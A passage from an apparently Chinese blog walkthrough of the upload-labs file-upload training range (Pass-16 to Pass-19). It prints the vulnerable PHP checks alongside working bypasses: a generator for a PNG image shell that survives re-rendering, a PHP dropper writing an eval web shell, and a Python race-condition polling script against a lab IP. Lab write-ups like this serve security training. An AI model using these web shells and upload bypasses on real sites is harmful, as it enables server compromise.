class="variable">$res</span> = <span class="title function_ invoke__">isImage</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$res</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$res</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><code>exif_imagetype</code>函数来检测上传的文件是否为图片,与 pass15 类似,所以绕过的方法也类似,我们可以用同样的 GIF 图片马</p>
<h2 id="Pass-17-二次渲染绕过"><a href="#Pass-17-二次渲染绕过" class="headerlink" title="Pass-17-二次渲染绕过"></a>Pass-17-二次渲染绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment">// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径</span></span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$filetype</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>];</span><br><span class="line"> <span class="variable">$tmpname</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$target_path</span>=UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">basename</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 获得上传文件的扩展名</span></span><br><span class="line"> <span class="variable">$fileext</span>= <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$filename</span>,<span class="string">"."</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//判断文件后缀与类型,合法才进行上传操作</span></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"jpg"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/jpeg"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefromjpeg</span>(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是jpg格式的图片!"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line"> <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">".jpg"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> <span class="title function_ invoke__">imagejpeg</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"png"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/png"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefrompng</span>(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是png格式的图片!"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line"> <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">".png"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> <span class="title function_ invoke__">imagepng</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>; </span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"gif"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/gif"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefromgif</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是gif格式的图片!"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line"> <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">".gif"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> <span class="title function_ invoke__">imagegif</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传后缀为.jpg|.png|.gif的图片文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>使用<code>imagecreatefrom...</code>函数对图片文件进行二次渲染。该函数调用了PHP GD库(GD库,是php处理图形的扩展库)<br>如果上传图片马,里面的一句话会被清除,因此需要制作一张二次渲染过后,一句话依旧存在的图片马。</p>
<p>下列代码,可以制作一张二次渲染过后,恶意代码依旧存在的png图片马</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="comment">//png.php</span></span><br><span class="line"> <span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0xe</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>, <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>, <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>, <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>, <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"> <span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./pass17.png'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>使用:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">php payload.php file.png</span><br></pre></td></tr></table></figure>
<p>file.png 是一张普通的 png 图片~<br>最终生成 pass17.png</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726105438294.png" alt="image-20200726105438294"></p>
<p>上传 pass17<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582860869-929498-upload-labs17-2.png" alt="img"></p>
<p>利用文件包含漏洞传 post 参数:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Load URL</span><br><span class="line">http://192.168.20.134/include.php?file=upload/pass17.png&0=phpinfo</span><br><span class="line"></span><br><span class="line">Post data</span><br><span class="line">1=-1</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582860893-792902-upload-labs17-3.png" alt="img"></p>
<blockquote>
<h1 id="Max-HackBar拓展"><a href="#Max-HackBar拓展" class="headerlink" title="Max HackBar拓展"></a>Max HackBar拓展</h1><p><a href="https://addons.mozilla.org/zh-CN/firefox/addon/max-hackbar/">https://addons.mozilla.org/zh-CN/firefox/addon/max-hackbar/</a></p>
</blockquote>
<h2 id="Pass-18-条件竞争"><a href="#Pass-18-条件竞争" class="headerlink" title="Pass-18-条件竞争"></a>Pass-18-条件竞争</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$file_name</span>,<span class="title function_ invoke__">strrpos</span>(<span class="variable">$file_name</span>,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="variable">$upload_file</span> = UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$file_name</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$upload_file</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span>. <span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="title function_ invoke__">rename</span>(<span class="variable">$upload_file</span>, <span class="variable">$img_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> <span class="title function_ invoke__">unlink</span>(<span class="variable">$upload_file</span>);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>一个典型的条件竞争上传<br>代码执行逻辑:先移动,后检测,不符合再删除,符合则改名字<br>因此我们可以用 burp 一直发包,让 php 程序一直处于移动 php 文件到 upload 目录这个阶段</p>
<p>我们使用多线程并发的访问上传的文件,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件,一旦我们成功访问到了上传的文件,那么它就会向服务器写一个shell</p>
<p>我们先来生成一个本 pass18 用的 php文件:pass18.php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?</span>PHP <span class="keyword">echo</span> ”<span class="number">1</span>“;<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST[cmd])?>'</span>);<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>然后制作一个 py 文件用来检测上传是否成功:pass18_check_upload.py</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line"> i=<span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="built_in">print</span>(i,end=<span class="string">'\r'</span>)</span><br><span class="line"> a = requests.get(<span class="string">"http://http://192.168.20.134:80/upload/pass18.php"</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"1"</span> <span class="keyword">in</span> a.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"OK"</span>)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> i+=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
<p>接下来使用 burp 构造 intruder 并发送<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582863890-932234-upload-labs18-2.png" alt="img"></p>
<p>接下来配置载荷<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582863911-248365-upload-labs18-3.png" alt="img"></p>
<p>调高线程数</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726111444677.png" alt="image-20200726111444677"></p>
<p>然后我的的 burp 和 py 同时执行,等待条件竞争成功上传成功</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python3 pass18_check_upload.py</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726112904493.png" alt="image-20200726112904493"></p>
<p>报错,需要安装pip和request模块</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">brew install python</span><br><span class="line">pip3 install --upgrade pip</span><br><span class="line">pip3 --version #查看版本</span><br><span class="line">pip3 list #查看相应的包</span><br><span class="line"></span><br><span class="line">pip3 install requests</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582864123-615793-upload-labs18-4.png" alt="img"></p>
<p>然后利用蚁剑或者菜刀连接一句话木马:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582864260-231062-upload-labs18-5.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582864269-973066-upload-labs18-6.png" alt="img"></p>
<h2 id="Pass-19-条件竞争2"><a href="#Pass-19-条件竞争2" class="headerlink" title="Pass-19-条件竞争2"></a>Pass-19-条件竞争2</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">require_once</span>(<span class="string">"./myupload.php"</span>);</span><br><span class="line"> <span class="variable">$imgFileName</span> =<span class="title function_ invoke__">time</span>();</span><br><span class="line"> <span class="variable">$u</span> = <span class="keyword">new</span> <span class="title class_">MyUpload</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'size'</span>],<span class="variable">$imgFileName</span>);</span><br><span class="line"> <span class="variable">$status_code</span> = <span class="variable">$u</span>-><span class="title function_ invoke__">upload</span>(UPLOAD_PATH);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$status_code</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$u</span>->cls_upload_dir . <span class="variable">$u</span>->cls_file_rename_to;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件已经被上传,但没有重命名。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">1</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'这个文件不能上传到服务器的临时文件存储目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传目录不可写。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">3</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,无法上传该类型文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">4</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传的文件过大。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">5</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,服务器已经存在相同名称文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">6</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件无法上传,文件不能复制到目标目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'未知错误!'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//myupload.php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyUpload</span></span>{</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line"> <span class="keyword">var</span> <span class="variable">$cls_arr_ext_accepted</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">".doc"</span>, <span class="string">".xls"</span>, <span class="string">".txt"</span>, <span class="string">".pdf"</span>, <span class="string">".gif"</span>, <span class="string">".jpg"</span>, <span class="string">".zip"</span>, <span class="string">".rar"</span>, <span class="string">".7z"</span>,<span class="string">".ppt"</span>,</span><br><span class="line"> <span class="string">".html"</span>, <span class="string">".xml"</span>, <span class="string">".tiff"</span>, <span class="string">".jpeg"</span>, <span class="string">".png"</span> );</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line"> <span class="comment">/** upload()</span></span><br><span class="line"><span class="comment"> **</span></span><br><span class="line"><span class="comment"> ** Method to upload the file.</span></span><br><span class="line"><span class="comment"> ** This is the only method to call outside the class.</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@para</span> String name of directory we upload to</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@returns</span> void</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"> <span class="variable">$dir</span> </span>)</span>{</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">isUploadedFile</span>();</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">setDir</span>( <span class="variable">$dir</span> );</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">checkExtension</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">checkSize</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if flag to check if the file exists is set to 1</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="variable language_">$this</span>->cls_file_exists == <span class="number">1</span> ){</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">checkFileExists</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// if we are here, we are ready to move the file to destination</span></span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">move</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// check if we need to rename the file</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable language_">$this</span>->cls_rename_file == <span class="number">1</span> ){</span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">renameFile</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if we are here, everything worked as planned :)</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="string">"SUCCESS"</span> );</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>似乎源码存在一个小 bug~<br>在 Pass19 目录下的 myupload.php 文件</p>
<p>将103行的</p>
